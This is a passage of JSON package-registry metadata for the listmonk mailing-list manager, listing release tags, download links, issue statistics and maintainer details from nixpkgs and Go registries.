dh/listmonk/tar.gz/v5.1.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.1.0/manifests"},{"name":"v5.0.3","sha":"48643aa93ef6d70afe550d8f526546a4931bf695","kind":"tag","published_at":"2025-07-06T16:11:23.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v5.0.3","html_url":"https://github.com/knadh/listmonk/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"d27d2c32cf3af2d0b24e29ea5a686ba149b49b3e","kind":"tag","published_at":"2025-06-08T09:40:22.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v5.0.2","html_url":"https://github.com/knadh/listmonk/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"dc466fc76bde033d48af5fe89ffbd84bb7e194d3","kind":"tag","published_at":"2025-05-25T09:45:26.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v5.0.1","html_url":"https://github.com/knadh/listmonk/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"3b8a8c23c586dd7b7851844aae91a370e21ecf35","kind":"tag","published_at":"2025-04-28T18:48:26.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v5.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.0/manifests"},{"name":"v4.1.0","sha":"0a27de16c6e23b7d4b84d4d91fe59bea10877ad1","kind":"tag","published_at":"2024-11-12T18:40:44.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v4.1.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"f5dfb0cf62f1097545ff315a5c1d9ac540d54b9e","kind":"tag","published_at":"2024-10-28T07:47:30.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v4.0.1","html_url":"https://github.com/knadh/listmonk/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"3894571d1ac0b5baa5bcb15a173e4e1020d7a113","kind":"tag","published_at":"2024-10-27T13:25:40.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v4.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.0.0/manifests"},{"name":"v3.0.0","sha":"f9120d9b80b1d0d86f27e3f23edfb2ffe6f5b091","kind":"tag","published_at":"2024-02-04T11:18:22.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v3.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v3.0.0/manifests"},{"name":"v2.5.1","sha":"a6a2b6982036eb6bebf9a1ff4d58ff4937ea3af1","kind":"tag","published_at":"2023-08-15T15:46:37.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.5.1","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"ea2f93ea066bc612b1161ba76324c11c8e495933","kind":"tag","published_at":"2023-08-10T18:32:51.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.5.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.5.0/manifests"},{"name":"v2.4.0","sha":"c668523c570519797e1e7f01958fe830378d253e","kind":"tag","published_at":"2023-03-20T13:48:00.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.4.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.4.0/manifests"},{"name":"v2.3.0","sha":"448f0e3428535bc93bc942c9867183f5adcaf057","kind":"tag","published_at":"2022-11-27T17:50:11.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.3.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"bbbf28c5ce981738c485d6d0e94c89df0fef6763","kind":"tag","published_at":"2022-07-30T18:09:14.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.2.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"0ecfb89f19e63da44df393b08cd2b21f90c79605","kind":"tag","published_at":"2022-02-12T15:24:59.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.1.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"05585b701b56a9aa1f1a7f1cdadec44c19541055","kind":"tag","published_at":"2021-09-27T17:57:16.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.0.0/manifests"},{"name":"v1.1.0","sha":"b3612927c82bee987c2c2d20322232b9144a3c8a","kind":"tag","published_at":"2021-06-09T14:43:46.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v1.1.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v1.1.0/manifests"},{"name":"v1.0.0","sha":"95a81d17ced9766d40447364de12925b51c844fd","kind":"commit","published_at":"2021-05-16T11:24:55.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v1.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v1.0.0/manifests"},{"name":"v0.9.0-beta","sha":"e90fb1d88d15aea4fc7028cd96b1a274f92ab05e","kind":"commit","published_at":"2021-02-13T12:41:10.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.9.0-beta","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.9.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.9.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.9.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.9.0-beta/manifests"},{"name":"v0.8.0-beta","sha":"cde0b4b42a3e0e18b7e08d701e5ca4482cd6fe73","kind":"commit","published_at":"2020-11-10T16:51:25.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.8.0-beta","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.8.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.8.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.8.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.8.0-beta/manifests"},{"name":"v0.7.0-alpha","sha":"0f055eacb87030b55970f4870ff3a0b22b0dcaef","kind":"commit","published_at":"2020-08-09T14:32:43.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.7.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.7.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.7.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.7.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.7.0-alpha/manifests"},{"name":"v0.6.2-alpha","sha":"82702ed5bc64c4cbc567b561f187bc3f8abe83b5","kind":"commit","published_at":"2020-05-25T06:25:02.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.6.2-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.6.2-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.6.2-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.2-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.2-alpha/manifests"},{"name":"v0.6.1-alpha","sha":"18329ff052e62e74b9114d4e2126074c9845277b","kind":"commit","published_at":"2020-05-17T15:37:48.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.6.1-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.6.1-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.6.1-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.1-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.1-alpha/manifests"},{"name":"v0.6.0-alpha","sha":"cb331b93418eecaffdfcdcc38c91606328afdf47","kind":"commit","published_at":"2020-05-16T18:09:40.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.6.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.6.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.6.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.0-alpha/manifests"},{"name":"v0.5.2-alpha","sha":"b8d9ab10f29d8fc3c3dc0fcfb235ce453d8c58bf","kind":"commit","published_at":"2020-04-02T12:52:56.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.5.2-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.5.2-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.5.2-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.2-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.2-alpha/manifests"},{"name":"v0.5.1-alpha","sha":"21ffe5fb02256a6e391b5e2ebe11554badee5ee5","kind":"commit","published_at":"2020-04-01T14:29:41.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.5.1-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.5.1-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.5.1-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.1-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.1-alpha/manifests"},{"name":"v0.5.0-alpha","sha":"ad9ee7528d34ce19659a7aa963ada18baebddb0b","kind":"commit","published_at":"2020-03-08T10:40:34.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.5.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.5.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.5.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.0-alpha/manifests"},{"name":"v0.4.0-alpha","sha":"62aa31b14cf651084a76aba0021106fd78911081","kind":"commit","published_at":"2020-02-09T13:45:14.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.4.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.4.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.4.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.4.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.4.0-alpha/manifests"},{"name":"v0.3.3-alpha","sha":"9a88c2ed7b69bf020ccc95625788017f214a29c3","kind":"commit","published_at":"2020-02-06T10:09:43.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.3.3-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.3.3-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.3.3-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.3-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.3-alpha/manifests"},{"name":"v0.3.2-alpha","sha":"047de697707e4a3ea23b53c7a1917f20edc9f8c2","kind":"commit","published_at":"2020-02-05T12:39:13.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.3.2-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.3.2-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.3.2-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.2-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.2-alpha/manifests"},{"name":"v0.3.1-alpha","sha":"1064f1e4d8b1ef8d083f02254900b42c442e6e92","kind":"commit","published_at":"2020-01-19T15:19:01.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.3.1-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.3.1-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.3.1-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.1-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.1-alpha/manifests"},{"name":"v0.3.0-alpha","sha":"ccd354df3f85259a0b88dffe4a51586aab01135b","kind":"commit","published_at":"2019-10-31T06:31:13.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.3.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.3.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.3.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.0-alpha/manifests"},{"name":"v0.2.2-alpha","sha":"d8d7f88af357823778f468ee50deef0b49f0cd77","kind":"commit","published_at":"2019-09-10T07:26:40.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.2.2-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.2.2-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.2.2-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.2-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.2-alpha/manifests"},{"name":"v0.2.1-alpha","sha":"649d1b11f0d4d0c353f9682656514056d4e7d769","kind":"tag","published_at":"2019-08-26T18:16:32.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.2.1-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.2.1-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.2.1-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.1-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.1-alpha/manifests"},{"name":"v0.2.0-alpha","sha":"b63b31ec52f52e48b6b456134857c737340f29f6","kind":"commit","published_at":"2019-07-21T16:42:54.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.2.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.2.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.2.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.0-alpha/manifests"},{"name":"v0.1.2-alpha","sha":"275554e57e31d5bf4505e06101e1c69ef91293ed","kind":"commit","published_at":"2019-07-12T11:49:26.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.1.2-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.1.2-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.1.2-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.2-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.2-alpha/manifests"},{"name":"v0.1.1-alpha","sha":"3d3af8c429bd4f0d4936115e9becd45d3a6b77c0","kind":"commit","published_at":"2019-07-12T10:18:29.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.1.1-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.1.1-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.1.1-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.1-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.1-alpha/manifests"},{"name":"v0.1.0-alpha","sha":"9fd9748d4d02f708d311ddf7d6d3b308b575e24b","kind":"commit","published_at":"2019-07-09T11:36:23.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.1.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.1.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.1.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.0-alpha/manifests"}]},"repo_metadata_updated_at":"2026-08-18T02:47:52.884Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:nix/listmonk?channel=24.11\u0026repository_url=https://channels.nixos.org/nixos-24.11","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/listmonk","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/listmonk","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/listmonk/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-11T05:00:15.084Z","issues_count":923,"pull_requests_count":424,"avg_time_to_close_issue":6063203.975,"avg_time_to_close_pull_request":1067791.0233918128,"issues_closed_count":640,"pull_requests_closed_count":342,"pull_request_authors_count":188,"issue_authors_count":621,"avg_comments_per_issue":2.734561213434453,"avg_comments_per_pull_request":1.0919811320754718,"merged_pull_requests_count":240,"bot_issues_count":0,"bot_pull_requests_count":66,"past_year_issues_count":95,"past_year_pull_requests_count":67,"past_year_avg_time_to_close_issue":3185527.6666666665,"past_year_avg_time_to_close_pull_request":636134.3191489362,"past_year_issues_closed_count":33,"past_year_pull_requests_closed_count":47,"past_year_pull_request_authors_count":44,"past_year_issue_authors_count":81,"past_year_avg_comments_per_issue":1.4105263157894736,"past_year_avg_comments_per_pull_request":1.462686567164179,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":15,"past_year_merged_pull_requests_count":23,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/issues","maintainers":[{"login":"knadh","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knadh"},{"login":"mr-karan","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mr-karan"},{"login":"rhnvrm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rhnvrm"}],"active_maintainers":[{"login":"knadh","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knadh"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/listmonk/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/listmonk/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/listmonk/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/listmonk/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/listmonk/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/listmonk/codemeta","maintainers":[{"uuid":"RaitoBezarius","login":null,"name":"Ryan Lahfa","email":"ryan@lahfa.xyz","url":"https://github.com/RaitoBezarius","packages_count":98,"html_url":null,"role":null,"created_at":"2026-03-09T06:14:29.169Z","updated_at":"2026-03-09T06:14:29.169Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/maintainers/RaitoBezarius/packages"}],"registry":{"name":"nixpkgs-24.11","url":"https://channels.nixos.org/nixos-24.11","ecosystem":"nixpkgs","default":false,"packages_count":121983,"maintainers_count":3777,"namespaces_count":0,"keywords_count":739,"github":"NixOS","metadata":{"funded_packages_count":3735},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:53.059Z","updated_at":"2026-09-01T05:05:03.491Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/namespaces"}},{"id":3567084,"name":"github.com/knadh/listmonk","ecosystem":"go","description":"","homepage":"https://github.com/knadh/listmonk","licenses":"agpl-3.0","normalized_licenses":["AGPL-3.0"],"repository_url":"https://github.com/knadh/listmonk","keywords_array":[],"namespace":"github.com/knadh","versions_count":22,"first_release_published_at":"2019-07-09T11:36:23.000Z","latest_release_published_at":"2021-06-09T14:41:45.000Z","latest_release_number":"v1.1.0","last_synced_at":"2026-09-01T12:16:56.944Z","created_at":"2022-04-11T02:34:30.320Z","updated_at":"2026-09-01T19:17:33.112Z","registry_url":"https://pkg.go.dev/github.com/knadh/listmonk","install_command":"go get github.com/knadh/listmonk","documentation_url":"https://pkg.go.dev/github.com/knadh/listmonk#section-documentation","metadata":{},"repo_metadata":{"id":37385001,"uuid":"193833307","full_name":"knadh/listmonk","owner":"knadh","description":"High performance, self-hosted, newsletter and mailing list manager with a modern dashboard. Single binary 